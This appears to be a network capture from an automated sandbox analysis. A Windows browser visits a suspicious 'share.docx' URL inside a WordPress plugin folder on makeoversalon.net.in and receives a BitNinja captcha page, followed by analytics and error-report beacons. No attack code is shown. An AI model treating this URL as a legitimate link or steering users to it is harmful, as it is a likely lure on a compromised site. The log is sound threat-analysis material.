Y3NzbDIijCISg3NzbDIig3NzZycnLDIijDIig3NzbDIijDIihfXl43NzY3NzY5OTjDIig3NzbCIig3NzY3NzbAIig4OTjDIig2NjU3NzbBIijBISjBISc3ODfDIig2NjU2NjU/Pz5CQUBFQkHDIijDIig3NzbDIig2NjW8JCrDIig3NjbCIig4ODfCISjDIijDIijBIig2NjU4ODe7Jiw2NjU2NjXDIijDIijDIig4ODc2NzXBIii9ICY6OjnCI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	184.31.62.93	443

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:07 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-20 06:24:07 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/079C) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=88754 Date: Sat, 20 Apr 2024 06:24:07 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	184.31.62.93	443

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:08 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-20 06:24:08 UTC	804	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/0778) X-CID: 11 X-CCC: US X-Azure-Ref-OriginShield: Ref A: 52EA27DBDE0C4533B819423583F6692E Ref B: CH1AA2040902052 Ref C: 2023-07-09T23:10:08Z X-MSEdge-Ref: Ref A: 528BB8D443C042AA9AEA4EC3F75C7762 Ref B: CHI30EDGE0111 Ref C: 2023-07-09T23:11:11Z Content-Type: application/octet-stream X-Azure-Ref: 01uvbYwAAAACkqWtaEMjWQL/4cpisZkorTUVNMzBFREdFMDgxMQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=88774 Date: Sat, 20 Apr 2024 06:24:08 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-20 06:24:08 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49746	5.9.123.217	443	7692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:08 UTC	943	OUT	POST /wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx HTTP/1.1 Host: makeoversalon.net.in Connection: keep-alive Content-Length: 127 Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://makeoversalon.net.in Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-20 06:24:08 UTC	127	OUT	Data Raw: 68 61 73 68 3d 34 66 32 33 30 63 32 34 33 35 36 30 38 31 37 63 36 64 34 63 64 32 35 34 34 65 37 62 65 63 38 37 64 61 34 34 30 64 32 32 26 6f 72 69 67 69 6e 5f 75 72 6c 3d 25 32 46 77 70 2d 63 6f 6e 74 65 6e 74 25 32 46 70 6c 75 67 69 6e 73 25 32 46 77 70 2d 63 75 73 74 6f 6d 2d 74 61 78 6f 6e 6f 6d 79 2d 69 6d 61 67 65 25 32 46 69 69 72 69 25 32 46 73 68 61 72 65 2e 64 6f 63 78 Data Ascii: hash=4f230c243560817c6d4cd2544e7bec87da440d22&origin_url=%2Fwp-content%2Fplugins%2Fwp-custom-taxonomy-image%2Fiiri%2Fshare.docx
2024-04-20 06:24:09 UTC	245	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Sat, 20 Apr 2024 06:24:08 GMT Content-Length: 45225 Connection: close
2024-04-20 06:24:09 UTC	15115	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 56 69 73 69 74 6f 72 20 61 6e 74 69 2d 72 6f 62 6f 74 20 76 61 6c 69 64 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"/> <title>Visitor anti-robot validation</title> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name=
2024-04-20 06:24:09 UTC	16384	IN	Data Raw: 91 74 2c 20 68 6f 67 79 20 49 50 20 63 c3 ad 6d 65 20 66 65 6c 6f 6c 64 c3 a1 73 72 61 20 6b 65 72 c3 bc 6c 6a c3 b6 6e 2e 22 2c 0a 20 20 20 20 20 20 20 20 42 45 53 54 5f 52 45 47 41 52 44 53 3a 20 22 4b c3 b6 73 7a c3 b6 6e 6a c3 bc 6b 20 65 67 79 c3 bc 74 74 6d c5 b1 6b c3 b6 64 c3 a9 73 c3 a9 74 2c 22 2c 0a 20 20 20 20 20 20 20 20 53 49 47 4e 41 54 55 52 45 3a 20 22 41 20 42 69 74 6e 69 6e 6a 61 20 63 73 61 70 61 74 61 22 2c 0a 20 20 20 20 20 20 20 20 41 43 43 45 53 53 49 4e 47 3a 20 22 41 22 2c 0a 20 20 20 20 20 20 20 20 53 45 43 55 52 45 4c 59 3a 20 22 6f 6c 64 61 6c 20 62 69 7a 74 6f 6e 73 c3 a1 67 6f 73 20 65 6c c3 a9 72 c3 a9 73 65 2e 22 2c 0a 20 20 20 20 20 20 20 20 50 52 4f 43 45 53 53 3a 0a 20 20 20 20 20 20 20 20 20 20 22 45 7a 20 65 67 79 20 Data Ascii: t, hogy IP cme feloldsra kerljn.", BEST_REGARDS: "Ksznjk egyttmkdst,", SIGNATURE: "A Bitninja csapata", ACCESSING: "A", SECURELY: "oldal biztonsgos elrse.", PROCESS: "Ez egy
2024-04-20 06:24:09 UTC	13726	IN	Data Raw: 59 33 4e 7a 62 44 49 69 6a 43 49 53 67 33 4e 7a 62 44 49 69 67 33 4e 7a 5a 79 63 6e 4c 44 49 69 6a 44 49 69 67 33 4e 7a 62 44 49 69 6a 44 49 69 68 66 58 6c 34 33 4e 7a 59 33 4e 7a 59 35 4f 54 6a 44 49 69 67 33 4e 7a 62 43 49 69 67 33 4e 7a 59 33 4e 7a 62 41 49 69 67 34 4f 54 6a 44 49 69 67 32 4e 6a 55 33 4e 7a 62 42 49 69 6a 42 49 53 6a 42 49 53 63 33 4f 44 66 44 49 69 67 32 4e 6a 55 32 4e 6a 55 2f 50 7a 35 43 51 55 42 46 51 6b 48 44 49 69 6a 44 49 69 67 33 4e 7a 62 44 49 69 67 32 4e 6a 57 38 4a 43 72 44 49 69 67 33 4e 6a 62 43 49 69 67 34 4f 44 66 43 49 53 6a 44 49 69 6a 44 49 69 6a 42 49 69 67 32 4e 6a 55 34 4f 44 65 37 4a 69 77 32 4e 6a 55 32 4e 6a 58 44 49 69 6a 44 49 69 6a 44 49 69 67 34 4f 44 63 32 4e 7a 58 42 49 69 69 39 49 43 59 36 4f 6a 6e 43 49 Data Ascii: Y3NzbDIijCISg3NzbDIig3NzZycnLDIijDIig3NzbDIijDIihfXl43NzY3NzY5OTjDIig3NzbCIig3NzY3NzbAIig4OTjDIig2NjU3NzbBIijBISjBISc3ODfDIig2NjU2NjU/Pz5CQUBFQkHDIijDIig3NzbDIig2NjW8JCrDIig3NjbCIig4ODfCISjDIijDIijBIig2NjU4ODe7Jiw2NjU2NjXDIijDIijDIig4ODc2NzXBIii9ICY6OjnCI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	104.26.14.182	443	7692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:09 UTC	594	OUT	GET /cookieimg.php HTTP/1.1 Host: admin.bitninja.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://makeoversalon.net.in/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-20 06:24:10 UTC	994	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 06:24:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close set-cookie: captcha-cookie=NGRjZjM0NzVmMjI0NzM0NWMzYjk5MTQzOGNlMmUzZGE%3D; expires=Sun, 21-Apr-2024 06:24:10 GMT; Max-Age=86400; path=/; domain=.bitninja.io strict-transport-security: max-age=15724800; includeSubDomains x-frame-options: DENY x-xss-protection: 1; mode=block x-content-type-options: nosniff Cache-Control: private vary: Origin x-kong-upstream-latency: 1 x-kong-proxy-latency: 28 via: kong/2.1.4 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YI1gzvi8TrNbcxLsvVAUhO1Innrxl9xm34Ag%2B5wEUF8HpZVSgNuefVkS1FOqMCFGL7F%2FE2RAlcrT3Sc3WIKNz3HgepR5cLMQAQnnWVjUIlx%2BpV4q%2BSJn7NcmTCP6DFxa6LX1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87730cbdd937ad71-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 06:24:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49753	35.190.80.1	443	7692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:10 UTC	538	OUT	OPTIONS /report/v4?s=YI1gzvi8TrNbcxLsvVAUhO1Innrxl9xm34Ag%2B5wEUF8HpZVSgNuefVkS1FOqMCFGL7F%2FE2RAlcrT3Sc3WIKNz3HgepR5cLMQAQnnWVjUIlx%2BpV4q%2BSJn7NcmTCP6DFxa6LX1 HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://admin.bitninja.io Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-20 06:24:10 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-length, content-type date: Sat, 20 Apr 2024 06:24:10 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49754	104.26.15.182	443	7692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:10 UTC	354	OUT	GET /cookieimg.php HTTP/1.1 Host: admin.bitninja.io Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-20 06:24:11 UTC	996	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 06:24:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close set-cookie: captcha-cookie=NTJmNjEwODIyOGIzNzVhZDdiMzA2ZDk1ZDllNDgyNTc%3D; expires=Sun, 21-Apr-2024 06:24:11 GMT; Max-Age=86400; path=/; domain=.bitninja.io strict-transport-security: max-age=15724800; includeSubDomains x-frame-options: DENY x-xss-protection: 1; mode=block x-content-type-options: nosniff Cache-Control: private vary: Origin x-kong-upstream-latency: 1 x-kong-proxy-latency: 27 via: kong/2.1.4 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ljq2jWRKTw2cjCW6MeviQwRgfMsutJFSjkY9sZ4shipT%2BZ3CVKvtC8YqLu%2FGPBN5flMEsyKTn18LC%2FpSPEJS6lDsbeZPOlcGZ%2FKRw65qOWcFRfSdSRJ%2F66u2rolCjQDwZNKC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87730cc3e860b032-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 06:24:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49755	35.190.80.1	443	7692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:11 UTC	478	OUT	POST /report/v4?s=YI1gzvi8TrNbcxLsvVAUhO1Innrxl9xm34Ag%2B5wEUF8HpZVSgNuefVkS1FOqMCFGL7F%2FE2RAlcrT3Sc3WIKNz3HgepR5cLMQAQnnWVjUIlx%2BpV4q%2BSJn7NcmTCP6DFxa6LX1 HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 428 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-20 06:24:11 UTC	428	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 39 36 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 61 6b 65 6f 76 65 72 73 61 6c 6f 6e 2e 6e 65 74 2e 69 6e 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 36 2e 31 34 2e 31 38 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 Data Ascii: [{"age":1,"body":{"elapsed_time":960,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://makeoversalon.net.in/","sampling_fraction":1.0,"server_ip":"104.26.14.182","status_code":200,"type":"abandoned"},"type":"network-error","ur
2024-04-20 06:24:11 UTC	168	IN	HTTP/1.1 200 OK Content-Length: 0 date: Sat, 20 Apr 2024 06:24:11 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49759	216.239.38.181	443	7692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:11 UTC	1346	OUT	POST /g/collect?v=2&tid=G-M2RCV3G3BZ&gtm=45je44h0v9139052269za200&_p=1713594248481&_gaz=1&gcd=13l3l3l3l1&npa=0&dma=0&cid=1276044083.1713594250&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&pscdl=noapi&_eu=AAAI&_s=1&sid=1713594250&sct=1&seg=0&dl=https%3A%2F%2Fmakeoversalon.net.in%2Fwp-content%2Fplugins%2Fwp-custom-taxonomy-image%2Fiiri%2Fshare.docx&dr=https%3A%2F%2Fmakeoversalon.net.in%2Fwp-content%2Fplugins%2Fwp-custom-taxonomy-image%2Fiiri%2Fshare.docx&dt=Visitor%20anti-robot%20validation&en=page_view&_fv=1&_ss=1&tfd=3102 HTTP/1.1 Host: analytics.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://makeoversalon.net.in X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://makeoversalon.net.in/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-20 06:24:11 UTC	454	IN	HTTP/1.1 204 No Content Access-Control-Allow-Origin: https://makeoversalon.net.in Date: Sat, 20 Apr 2024 06:24:11 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Access-Control-Allow-Credentials: true Content-Type: text/plain Cross-Origin-Resource-Policy: cross-origin Server: Golfe2 Content-Length: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49760	74.125.136.154	443	7692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:11 UTC	799	OUT	POST /g/collect?v=2&tid=G-M2RCV3G3BZ&cid=1276044083.1713594250&gtm=45je44h0v9139052269za200&aip=1&dma=0&gcd=13l3l3l3l1&npa=0 HTTP/1.1 Host: stats.g.doubleclick.net Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://makeoversalon.net.in X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://makeoversalon.net.in/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-20 06:24:11 UTC	454	IN	HTTP/1.1 204 No Content Access-Control-Allow-Origin: https://makeoversalon.net.in Date: Sat, 20 Apr 2024 06:24:11 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Access-Control-Allow-Credentials: true Content-Type: text/plain Cross-Origin-Resource-Policy: cross-origin Server: Golfe2 Content-Length: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49762	74.125.136.154	443	7692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:11 UTC	876	OUT	POST /j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-1975075-20&cid=1276044083.1713594250&jid=1814692829&gjid=287345157&_gid=1937593962.1713594250&_u=YEBAAUAAAAAAACAAI~&z=981243278 HTTP/1.1 Host: stats.g.doubleclick.net Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain Accept: / Origin: https://makeoversalon.net.in X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://makeoversalon.net.in/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-20 06:24:11 UTC	598	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://makeoversalon.net.in Strict-Transport-Security: max-age=10886400; includeSubDomains; preload Date: Sat, 20 Apr 2024 06:24:11 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Last-Modified: Sun, 17 May 1998 03:00:00 GMT Access-Control-Allow-Credentials: true X-Content-Type-Options: nosniff Content-Type: text/plain Cross-Origin-Resource-Policy: cross-origin Server: Golfe2 Content-Length: 2 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-20 06:24:11 UTC	2	IN	Data Raw: 31 67 Data Ascii: 1g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49768	64.233.177.157	443	7692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:12 UTC	616	OUT	GET /j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-1975075-20&cid=1276044083.1713594250&jid=1814692829&gjid=287345157&_gid=1937593962.1713594250&_u=YEBAAUAAAAAAACAAI~&z=981243278 HTTP/1.1 Host: stats.g.doubleclick.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-20 06:24:12 UTC	531	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=10886400; includeSubDomains; preload Date: Sat, 20 Apr 2024 06:24:12 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Last-Modified: Sun, 17 May 1998 03:00:00 GMT X-Content-Type-Options: nosniff Content-Type: text/plain Cross-Origin-Resource-Policy: cross-origin Server: Golfe2 Content-Length: 2 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-20 06:24:12 UTC	2	IN	Data Raw: 31 67 Data Ascii: 1g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49767	142.250.105.104	443	7692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:12 UTC	821	OUT	GET /ads/ga-audiences?t=sr&aip=1&_r=4&slf_rd=1&v=1&_v=j101&tid=UA-1975075-20&cid=1276044083.1713594250&jid=1814692829&_u=YEBAAUAAAAAAACAAI~&z=711350274 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://makeoversalon.net.in/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-20 06:24:12 UTC	539	IN	HTTP/1.1 200 OK P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC" Timing-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Date: Sat, 20 Apr 2024 06:24:12 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Content-Type: image/gif X-Content-Type-Options: nosniff Server: cafe Content-Length: 42 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-20 06:24:12 UTC	42	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b Data Ascii: GIF89a!,D;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49769	64.233.185.147	443	7692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:12 UTC	581	OUT	GET /ads/ga-audiences?t=sr&aip=1&_r=4&slf_rd=1&v=1&_v=j101&tid=UA-1975075-20&cid=1276044083.1713594250&jid=1814692829&_u=YEBAAUAAAAAAACAAI~&z=711350274 HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
